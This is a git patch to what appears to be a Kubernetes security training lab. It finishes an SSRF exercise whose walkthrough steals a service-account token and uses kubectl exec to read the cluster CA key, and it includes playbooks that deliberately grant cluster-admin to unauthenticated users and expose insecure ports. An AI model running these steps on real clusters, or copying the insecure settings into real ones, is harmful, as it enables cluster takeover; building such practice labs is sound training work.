From 98bf904f0bfe98ee412422f154e25824cb82a510 Mon Sep 17 00:00:00 2001 From: Rory McCune Date: Sat, 21 Sep 2019 20:41:12 +0100 Subject: [PATCH] Finish SSRF exercise and add cluster IP print to playbooks --- Scenario Setups/ssrf-to-insecure-port.md | 6 +++-- .../ssrf-to-insecure-port.md | 12 ++++++---- ansible_tasks/print_cluster_ip.yml | 4 ++++ client-machine.retry | 1 - demo-cluster.yml | 3 ++- etcd-noauth.yml | 1 + insecure-port.yml | 1 + kubeadm_configs/localinsecureport.yml | 23 +++++++++++++++++++ manifests/ssrfdeployment.yml | 1 + rwkubelet-noauth.yml | 2 +- ssh-to-cluster-master.yml | 2 ++ ssh-to-create-pods-easy.yml | 4 +++- ssh-to-create-pods-hard.yml | 4 +++- ssh-to-get-secrets.yml | 4 +++- ssrf-to-insecure-port.yml | 4 +++- tiller-noauth.yml | 2 ++ unauth-api-server.yml | 2 ++ 17 files changed, 63 insertions(+), 13 deletions(-) create mode 100644 ansible_tasks/print_cluster_ip.yml delete mode 100644 client-machine.retry create mode 100644 kubeadm_configs/localinsecureport.yml diff --git a/Scenario Setups/ssrf-to-insecure-port.md b/Scenario Setups/ssrf-to-insecure-port.md index 98e05d9..448d305 100644 --- a/Scenario Setups/ssrf-to-insecure-port.md +++ b/Scenario Setups/ssrf-to-insecure-port.md @@ -13,7 +13,9 @@ docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' ssh At this point, if you're running on a Linux host, you should be able to connect to the web application on the Docker network at ``` -http://[CLUSTERIP]:32001/ +http://127.0.0.1:32001/ ``` -The username is `ssrftester` and the password is `ssrftester` \ No newline at end of file +The username is `ssrftester` and the password is `ssrftester` + +The insecure port is only availble on 127.0.0.1, but the other cluster services (inc. API server) should be available on the clusterip \ No newline at end of file diff --git a/Scenario Walkthroughs/ssrf-to-insecure-port.md b/Scenario Walkthroughs/ssrf-to-insecure-port.md index 45c1dcc..75e8f90 100644 --- a/Scenario Walkthroughs/ssrf-to-insecure-port.md +++ b/Scenario Walkthroughs/ssrf-to-insecure-port.md @@ -4,7 +4,11 @@ The application provides the facility to do GET and POST requests, so there's a One option would be -1. Get a list of running pods using the GET SSRF endpoint - - http://[CLUSTERIP]:8080/api/v1/pods -2. From that get the name of the kube-apiserver pod (it should be something like `kube-apiserver-ssrfinsecureport-control-plane`) -3. Then execute our cat command for the ca.key file using the POST endpoint. \ No newline at end of file +1. Get a list of secrets using the GET SSRF endpoint + - http://127.0.0.1:8080/api/v1/secrets +2. Get a secret that has privileges on the API server (e.g. clusterrole-aggregation-controller-token) +3. Find the token: field and make a copy of it +4. Base64 decode the token (one way to do that https://gchq.github.io/CyberChef) +5. use the token to make requests to the exposed API server + 1. `kubectl --insecure-skip-tls-verify --token=[TOKEN] -shttps://[CLUSTERIP]:6443 get po -n kube-system` + 2. `kubectl --insecure-skip-tls-verify --token=[TOKEN] -shttps://[CLUSTERIP]:6443 -n kube-system exec [APISERVERPOD] cat /etc/kubernetes/pki/ca.key` \ No newline at end of file diff --git a/ansible_tasks/print_cluster_ip.yml b/ansible_tasks/print_cluster_ip.yml new file mode 100644 index 0000000..2d30320 --- /dev/null +++ b/ansible_tasks/print_cluster_ip.yml @@ -0,0 +1,4 @@ +--- + - name: Print the Cluster IP address + debug: + msg: "The Cluster IP address is {{ ansible_default_ipv4.address }} " \ No newline at end of file diff --git a/client-machine.retry b/client-machine.retry deleted file mode 100644 index 2fbb50c..0000000 --- a/client-machine.retry +++ /dev/null @@ -1 +0,0 @@ -localhost diff --git a/demo-cluster.yml b/demo-cluster.yml index 0fdaefa..bb0a980 100644 --- a/demo-cluster.yml +++ b/demo-cluster.yml @@ -36,4 +36,5 @@ fetch: src: /etc/kubernetes/admin.conf dest: /tmp/demo-kubernetes-admin.conf - flat: yes \ No newline at end of file + flat: yes + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file diff --git a/etcd-noauth.yml b/etcd-noauth.yml index 656dc08..61092c6 100644 --- a/etcd-noauth.yml +++ b/etcd-noauth.yml @@ -30,4 +30,5 @@ tasks: - import_tasks: ./ansible_tasks/setup_kubeconfig.yml + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file diff --git a/insecure-port.yml b/insecure-port.yml index b8d7aec..b19b980 100644 --- a/insecure-port.yml +++ b/insecure-port.yml @@ -30,4 +30,5 @@ tasks: - import_tasks: ./ansible_tasks/setup_kubeconfig.yml + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file diff --git a/kubeadm_configs/localinsecureport.yml b/kubeadm_configs/localinsecureport.yml new file mode 100644 index 0000000..84adb5e --- /dev/null +++ b/kubeadm_configs/localinsecureport.yml @@ -0,0 +1,23 @@ + +# this config file contains all config fields with comments +kind: Cluster +apiVersion: kind.sigs.k8s.io/v1alpha3 +# patch the generated kubeadm config with some extra settings +kubeadmConfigPatches: +- | + apiVersion: kubeadm.k8s.io/v1beta2 + kind: ClusterConfiguration + metadata: + name: config + apiServer: + extraArgs: + # Don't forget quotes on the values + insecure-bind-address: "127.0.0.1" + insecure-port: "8080" +# 1 control plane node and 3 workers +nodes: +# the control plane node config +- role: control-plane + extraPortMappings: + - containerPort: 8080 + hostPort: 8080 diff --git a/manifests/ssrfdeployment.yml b/manifests/ssrfdeployment.yml index e3f0c59..52d840a 100644 --- a/manifests/ssrfdeployment.yml +++ b/manifests/ssrfdeployment.yml @@ -12,6 +12,7 @@ spec: labels: run: ssrf spec: + hostNetwork: true containers: - name: ssrf image: raesene/ssrftester diff --git a/rwkubelet-noauth.yml b/rwkubelet-noauth.yml index 5023ad1..bea128a 100644 --- a/rwkubelet-noauth.yml +++ b/rwkubelet-noauth.yml @@ -30,4 +30,4 @@ tasks: - import_tasks: ./ansible_tasks/setup_kubeconfig.yml - \ No newline at end of file + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file diff --git a/ssh-to-cluster-master.yml b/ssh-to-cluster-master.yml index 0c06db2..97d989c 100644 --- a/ssh-to-cluster-master.yml +++ b/ssh-to-cluster-master.yml @@ -33,3 +33,5 @@ - name: make the default service account cluster-admin command: kubectl --kubeconfig=/etc/kubernetes/admin.conf create clusterrolebinding serviceaccounts-cluster-admin --clusterrole=cluster-admin --group=system:serviceaccounts + + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file diff --git a/ssh-to-create-pods-easy.yml b/ssh-to-create-pods-easy.yml index ab87a24..e400523 100644 --- a/ssh-to-create-pods-easy.yml +++ b/ssh-to-create-pods-easy.yml @@ -40,4 +40,6 @@ command: kubectl create -f /root/pod-manager.yml - name: Give the default service account rights to manage pods - command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-manager --group=system:serviceaccounts \ No newline at end of file + command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-manager --group=system:serviceaccounts + + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file diff --git a/ssh-to-create-pods-hard.yml b/ssh-to-create-pods-hard.yml index 44381d4..8561a16 100644 --- a/ssh-to-create-pods-hard.yml +++ b/ssh-to-create-pods-hard.yml @@ -40,4 +40,6 @@ command: kubectl create -f /root/pod-creator.yml - name: Give the default service account rights to manage pods - command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-creator --group=system:serviceaccounts \ No newline at end of file + command: kubectl create rolebinding serviceaccounts-pod-manager --role=pod-creator --group=system:serviceaccounts + + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file diff --git a/ssh-to-get-secrets.yml b/ssh-to-get-secrets.yml index d735e58..0d851db 100644 --- a/ssh-to-get-secrets.yml +++ b/ssh-to-get-secrets.yml @@ -40,4 +40,6 @@ command: kubectl create -f /root/secret-reader.yml - name: Give the default service account rights to manage pods - command: kubectl create clusterrolebinding serviceaccounts-secret-reader --clusterrole=secret-reader --group=system:serviceaccounts \ No newline at end of file + command: kubectl create clusterrolebinding serviceaccounts-secret-reader --clusterrole=secret-reader --group=system:serviceaccounts + + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file diff --git a/ssrf-to-insecure-port.yml b/ssrf-to-insecure-port.yml index 8adc3fb..8f57a82 100644 --- a/ssrf-to-insecure-port.yml +++ b/ssrf-to-insecure-port.yml @@ -6,7 +6,7 @@ cluster_name: ssrfinsecureport # This needs to be the cluster name with -control-plane added container_name: ssrfinsecureport-control-plane - cluster_config: insecureport.yml + cluster_config: localinsecureport.yml tasks: - name: Start a kind cluster @@ -31,5 +31,7 @@ tasks: - import_tasks: ./ansible_tasks/setup_kubeconfig.yml - import_tasks: ./ansible_tasks/setup_ssrf_pod.yml + - import_tasks: ./ansible_tasks/print_cluster_ip.yml + \ No newline at end of file diff --git a/tiller-noauth.yml b/tiller-noauth.yml index a7b7373..6e38794 100644 --- a/tiller-noauth.yml +++ b/tiller-noauth.yml @@ -34,3 +34,5 @@ - name: Expose Tiller via NodePort command: kubectl patch svc tiller-deploy -n kube-system --type='json' -p '[{"op":"replace","path":"/spec/type","value":"NodePort"}]' + + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file diff --git a/unauth-api-server.yml b/unauth-api-server.yml index fd986bc..17138d6 100644 --- a/unauth-api-server.yml +++ b/unauth-api-server.yml @@ -32,3 +32,5 @@ - name: cluster-admin Unauthenticated command: kubectl create clusterrolebinding unauth-cluster-admin --clusterrole=cluster-admin --group=system:unauthenticated + + - import_tasks: ./ansible_tasks/print_cluster_ip.yml \ No newline at end of file